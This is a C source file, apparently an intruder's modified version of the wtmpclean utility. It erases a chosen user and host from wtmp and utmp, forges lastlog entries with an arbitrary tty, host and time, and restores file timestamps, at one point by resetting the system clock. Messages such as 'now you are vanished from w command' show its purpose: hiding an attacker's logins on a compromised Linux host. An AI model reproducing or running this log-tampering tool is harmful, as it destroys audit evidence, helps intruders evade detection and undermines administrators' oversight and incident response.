/*
 * wtmpclean.c -- clear from a wtmp database the unwanted records
 * Copyright (C) 2008 by Davide Madrisan <davide.madrisan@gmail.com>
 * Modified by xi4oyu : Add lastlog & utmp log clean and modify program
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*
 * indent -i4 -nut src/wtmpclean.c
 */

#ifdef HAVE_CONFIG_H
# include "config.h"
#endif

#include <stdio.h>
#ifdef HAVE_SYS_TYPES_H
# include <sys/types.h>
#endif
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
#endif
#ifdef STDC_HEADERS
# include <stdlib.h>
# include <stddef.h>
#else
# ifdef HAVE_STDLIB_H
#  include <stdlib.h>
# endif
#endif
#ifdef HAVE_STRING_H
# if !defined STDC_HEADERS && defined HAVE_MEMORY_H
#  include <memory.h>
# endif
# include <string.h>
#endif
#ifdef HAVE_STRINGS_H
# include <strings.h>
#endif

#include <errno.h>
#include <time.h>
#include <unistd.h>
#include <utime.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pwd.h>
#include <lastlog.h>

#ifdef HAVE_UTMPX_H
# include <utmpx.h>
#else
# ifdef HAVE_UTMP_H
#  include <utmp.h>
# endif
#endif

#include "wtmpclean.h"
#include "getopt.h"
static int change_ctime(const char *file, const struct timeval *ctime)
{
    struct timeval tv[2], now;    
    struct stat inode;

    /* Get file's atime & mtime */
    if (stat(file, &inode) < 0) return -1;

    memset(&tv, 0, sizeof(tv));
    /* st_[am]time may be either struct timespec or time_t
     * the first member of struct timespec is tv_sec
     * (the same as struct timeval)
     */
    memcpy(&tv[0], &inode.st_atime, sizeof(inode.st_atime));
    tv[0].tv_usec /= 1000;	/* nanosecs to microsecs */
    memcpy(&tv[1], &inode.st_mtime, sizeof(inode.st_mtime));
    tv[1].tv_usec /= 1000;	/* nanosecs to microsecs */    
    
    /* Save current time */
    if (gettimeofday(&now, NULL) < 0) return -1;
    
    if (settimeofday(ctime, NULL) < 0) return -1;
    
    if (utimes(file, tv) < 0) return -1;
    
    /* Restore system time */
    if (settimeofday(&now, NULL) < 0) return -1;
    
    return 0;
}

/* converts from "YYYY:MM:DD:hh:mm:ss:uuuuuu" to struct timeval */
time_t str2time(const char *s)
{
    struct tm tm;
#define DELIM   ':'
    
    
    memset(&tm, 0, sizeof(tm));
    if (s) {
        tm.tm_year = atoi(s) - 1900;
        if ( (s = strchr(s, DELIM))) {
            tm.tm_mon = atoi(++s) - 1;
            if ( (s = strchr(s, DELIM))) {
                tm.tm_mday = atoi(++s);
                if ( (s = strchr(s, DELIM))) {
                    tm.tm_hour = atoi(++s);
                    if ( (s = strchr(s, DELIM))) {
                        tm.tm_min = atoi(++s);
                        if ( (s = strchr(s, DELIM))) {
                            tm.tm_sec = atoi(++s);
                        }
                    }
                }
            }
        }
    }
    return mktime(&tm);

}


void
usage (int status)
{
    static const char *usagemsg[] = {
        PACKAGE " version " PACKAGE_VERSION,
        "Copyright (C) 2008 by Davide Madrisan <davide.madrisan@gmail.com>",
        "Modified by xi4oyu <evil.xi4oyu@gmail.com>",
        "Add utmp delete and lastlog modify fucntion"
        "",
        "Usage: " PACKAGE " [-l] [-p]"
#if defined(HAVE_UTMPXNAME) || defined(HAVE_UTMPNAME)
            " [-f <wtmpfile>]"
#endif
            " <username> <hostname>",

	   "Modify last log: " PACKAGE " -m <username> <hostname> <ttyname> YYYY[:MM[:DD[:hh[:mm[:ss]]]]]\n",
		
#if defined(HAVE_UTMPXNAME) || defined(HAVE_UTMPNAME)
        "  -f, --file       Modify <wtmpfile> instead of " DEFAULT_WTMP,
#endif
        "  -l, --list       Show listing of <user> logins",
        "  -p, --preserve   Preserve ownership and timestamps",
	"  -m,              Modify the lastlog file",
        "",
        "Samples:",
#if defined(HAVE_UTMPXNAME) || defined(HAVE_UTMPNAME)
        "  ./" PACKAGE " root 127.0.0.1",
        "  ./" PACKAGE " -p -f " DEFAULT_WTMP ".1 root 127.0.0.1",
	"  ./" PACKAGE " -m root localdomain tty1 2008:1:1:1:1:1",
#else
        "  ./" PACKAGE " --preserve root 127.0.0.1",
#endif
        "",
        "This is free software; see the source for copying conditions.  There is NO",
        "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.",
        (char *) 0
    };

    unsigned int i;

    for (i = 0; usagemsg[i]; i++)
        fprintf (status ? stderr : stdout, "%s\n", usagemsg[i]);

    exit (status);
}


unsigned int utmpedit(const char * hostname,unsigned int preserve) 
{ 
    struct utmpx utmp_ent;
    struct stat sb;
    struct utimbuf currtime;
	int f;
    uid_t owner = 0;   /* set to '0' to avoid a gcc warning */
    gid_t group = 0;

    if (access (UTMPFILE, W_OK))
      {
          perror ("cannot access the file");
          exit (1);
      }

    if (preserve)
      {
          if (stat (UTMPFILE, &sb))
            {
                perror ("cannot get file status");
                exit (1);
            }
          currtime.actime = sb.st_atime;
          currtime.modtime = sb.st_mtime;
          owner = sb.st_uid;
          group = sb.st_gid;
      }

if ((f=open(UTMPFILE,O_RDWR))>=0) { 
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) 
if (!strncmp(utmp_ent.ut_host,hostname,strlen(hostname))) { 
bzero((char *)&utmp_ent,sizeof( utmp_ent )); 
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); 
write (f, &utmp_ent, sizeof (utmp_ent)); 
} 
close(f);


 if (preserve && chown (UTMPFILE, owner, group) < 0)
      {
          fprintf (stderr, "Cannot preserve the ownership of the utmp file");
      }
    if (preserve && utime (UTMPFILE, &currtime) < 0)
      {
          fprintf (stderr, "Cannot preserve access and modification times");
      }

return 0;
} 

return 1;
}





int
main (int argc, char **argv)
{
    const char *wtmpfile = DEFAULT_WTMP;
    int opt, opt_index = 0;
    unsigned int lflag = 0, pflag = 0,mflag=0;
    unsigned int cleanrec,cleanerr;
    char *user = NULL;
	char *host = NULL;
	char *tty  = NULL;
	char *lasttime = NULL;

    static struct option long_options[] = {
#if defined(HAVE_UTMPXNAME) || defined(HAVE_UTMPNAME)
        {"file", required_argument, 0, 'f'},
#endif
        {"list", no_argument, 0, 'l'},
        {"preserve", no_argument, 0, 'p'},
        {"help", no_argument, 0, 'h'},
	{"modlastlog", no_argument, 0, 'm'},
        {0, 0, 0, 0}
    };
    static const char *options =
#if defined(HAVE_UTMPXNAME) || defined(HAVE_UTMPNAME)
        "f:"
#endif
        "lphm";
    opterr = 0;

    while (1)
      {
          opt = getopt_long (argc, argv, options, long_options, &opt_index);
          if (opt == -1)
            {
                break;
            }

          switch (opt)
            {
            case 'f':
                wtmpfile = optarg;
                break;
            case 'p':
                pflag = 1;
                break;
            case 'l':
                lflag = 1;
                break;
            case 'm':
		mflag = 1;
	        break;
            default:
                usage ((opt == 'h') ? 1 : 0);
            }
      }

    if(lflag){

	if (argc != optind + 1)
          usage (1);
		
   }else if (argc == optind){
		usage(1);
	}



     user = argv[optind];
    host = argv[optind+1];

	if(mflag){
		tty = argv[optind+2];
		lasttime = argv[optind+3];

	}
	
    if (lflag)
      {
          wtmpchkusr (wtmpfile, user);
          exit (0);
      }


	if(mflag){

		cleanrec=lastlogedit(user,host,tty,lasttime);
		if (cleanrec > 0){
			fprintf(stderr,"Cannot modify lastlog\n");
			exit(0);
		}else 
			printf("modify lastlog OK,now you are safe\n");
		
		exit(0);

	}

	
     cleanrec = utmpedit(host,pflag);
	
	if(cleanrec >0){
		fprintf(stderr,"Cannot clean up utmpfile\n");
			
	}else {

		printf("clean utmp OK,now you are vanished from w command\n");

	}

	
    cleanrec = wtmpedit (wtmpfile, user, host,pflag, &cleanerr);

    if (cleanerr > 0)
      {
          fprintf (stderr, "Cannot clean up %s\n", wtmpfile);
      }
    else
      {
          printf ("%u block(s) logging user %s removed from %s\n",
                  cleanrec, user, wtmpfile);
      }

    return 0;
}

void
list (struct utmpxlist *p)
{
    char *ct;

    printf ("%s  ", p->ut.ut_user);
    ct = ctime (&p->ut.ut_tv.tv_sec);
    printf ("%10.10s %4.4s %5.5s - ", ct, ct + 20, ct + 11);
    if (p->delta < 0)
      {
          printf ("still logged in\n");
          return;
      }

    ct = ctime (&p->eos);
    printf ("%5.5s ", ct + 11);
    if (p->delta < SECDAY)
        printf ("(%5.5s)   ", asctime (gmtime (&p->delta)) + 11);
    else
        printf ("(%ld+%5.5s)  ", p->delta / SECDAY,
                asctime (gmtime (&p->delta)) + 11);
    printf ("%s  %s\n", p->ut.ut_line, p->ut.ut_host);
}

unsigned int
wtmpedit (const char *wtmpfile, const char *user, const char * host,unsigned int preserve,
          unsigned int *cleanerr)
{
    static struct utmpx *utp;
    unsigned int cleanrec;
    struct stat sb;
    struct utimbuf currtime;
    uid_t owner = 0;   /* set to '0' to avoid a gcc warning */

    gid_t group = 0;

    if (access (wtmpfile, W_OK))
      {
          perror ("cannot access the file");
          exit (1);
      }

    if (preserve)
      {
          if (stat (wtmpfile, &sb))
            {
                perror ("cannot get file status");
                exit (1);
            }
          currtime.actime = sb.st_atime;
          currtime.modtime = sb.st_mtime;
          owner = sb.st_uid;
          group = sb.st_gid;
      }

    UTMPXNAME (wtmpfile);
    setutxent ();

    cleanrec = *cleanerr = 0;
    while ((utp = getutxent ()))
      {
          if (utp->ut_type == USER_PROCESS &&
		  	  strncmp (utp->ut_host ,host,sizeof utp->ut_host)== 0 &&
              strncmp (utp->ut_user, user, sizeof utp->ut_user) == 0)
            {
                utp->ut_type = DEAD_PROCESS;
                memset (utp->ut_line, 0, sizeof utp->ut_line);
                utp->ut_tv.tv_sec = utp->ut_tv.tv_usec = 0;
                memset (utp->ut_user, 0, sizeof utp->ut_user);
                memset (utp->ut_host, 0, sizeof utp->ut_host);  /* ??? */
#ifdef HAVE_UTP_UT_ADDR_V6
                memset (utp->ut_addr_v6, 0, sizeof utp->ut_addr_v6);    /* ??? */
#endif
                /* ... utp->ut_pid ... */

                if (pututxline (utp))
                  {
                      cleanrec++;
                  }
                else
                  {
                      cleanerr++;
                  }
            }
      }

    endutxent ();

    if (preserve && chown (wtmpfile, owner, group) < 0)
      {
          fprintf (stderr, "Cannot preserve the ownership of the wtmp file");
      }
    if (preserve && utime (wtmpfile, &currtime) < 0)
      {
          fprintf (stderr, "Cannot preserve access and modification times");
      }

    return cleanrec;
}

unsigned int
lastlogedit(const char *user, const char *host,const char *tty,const char* time)
{

	struct passwd *p;
        struct lastlog ent;
	struct stat sb;
        struct utimbuf currtime;
	int fd;
        uid_t owner = 0;   /* set to '0' to avoid a gcc warning */
        gid_t group = 0;

    if (access (LASTLOG, W_OK))
      {
          perror ("cannot access the file");
          exit (1);
      }

     if (stat (LASTLOG, &sb))
       {
                perror ("cannot get file status");
                exit (1);
        }
          currtime.actime = sb.st_atime;
          currtime.modtime = sb.st_mtime;
          owner = sb.st_uid;
          group = sb.st_gid;

	  memset(&ent,0,sizeof(struct lastlog));

          if ((p=getpwnam(user))==NULL)
          {
            perror ("root doesn't exists..\n");
            exit (1);
          }

	

          if ((fd=open(LASTLOG,O_RDWR))<=0) 
          
      	 {
            perror ("can't open lastlog ,are you root ?..\n");
            exit (1);
          }

          strncpy(ent.ll_line,tty,strlen(tty));
          strncpy(ent.ll_host,host,strlen(host));
	  ent.ll_time = str2time(time);
          lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET);

          write(fd,&ent,sizeof(struct lastlog));

          close(fd);




	if ( chown (LASTLOG, owner, group) < 0)
      {
          fprintf (stderr, "Cannot preserve the ownership of the lastlog file");
      }
    if (utime (LASTLOG, &currtime) < 0)
      {
          fprintf (stderr, "Cannot preserve access and modification times");
      }


}


void
wtmpchkusr (const char *wtmpfile, const char *user)
{
    struct utmpxlist *p, *curr = NULL, *next, *utmpxlist = NULL;
    struct utmpx *utp;

    if (access (wtmpfile, R_OK))
      {
          perror ("cannot access the file");
          exit (1);
      }

    UTMPXNAME (wtmpfile);
    setutxent ();

    while ((utp = getutxent ()))
      {
          switch (utp->ut_type)
            {
            case USER_PROCESS:
                /*
                 * Just store the data if it is interesting enough.
                 */
                if (strncmp (utp->ut_user, user, sizeof utp->ut_user) == 0)
                  {
                      if ((p = malloc (sizeof (struct utmpxlist))) == NULL)
                        {
                            perror ("out of memory");
                            exit (1);
                        }
                      memcpy (&p->ut, utp, sizeof (struct utmpx));
                      p->delta = -1;    /* '-1' means "unset" */
                      p->next = NULL;
                      if (utmpxlist == NULL)
                        {
                            utmpxlist = curr = p;
                            p->prev = NULL;
                        }
                      else
                        {
                            curr->next = p;
                            p->prev = curr;
                            curr = p;
                        }
                  }
                break;
            case BOOT_TIME:
                /*ct = ctime (&utp->ut_tv.tv_sec);
                 *printf ("%10.10s %4.4s %5.5s [system boot]\n",
                 *         ct, ct + 20, ct + 11);
                 */
            case DEAD_PROCESS:
                for (p = curr; p; p = p->prev)
                  {
                      if (p->ut.ut_type != USER_PROCESS || p->delta != -1)
                          continue;
                      /*if (strncmp (p->ut.ut_user, utp->ut_user, sizeof utp->ut_user))
                       *    continue;
                       */
                      if (strncmp
                          (p->ut.ut_line, utp->ut_line, sizeof utp->ut_line))
                          continue;
                      p->eos = utp->ut_tv.tv_sec;
                      p->delta = utp->ut_tv.tv_sec - p->ut.ut_tv.tv_sec;

                      if (utp->ut_type == DEAD_PROCESS)
                          break;
                  }
                break;
            case INIT_PROCESS:
            case LOGIN_PROCESS:
            case OLD_TIME:
            case NEW_TIME:
                /*case SHUTDOWN_TIME: */
                break;
            }
      }

    for (p = utmpxlist; p; p = next)
      {
          next = p->next;
          list (p);
          free (p);
      }
    endutxent ();
}
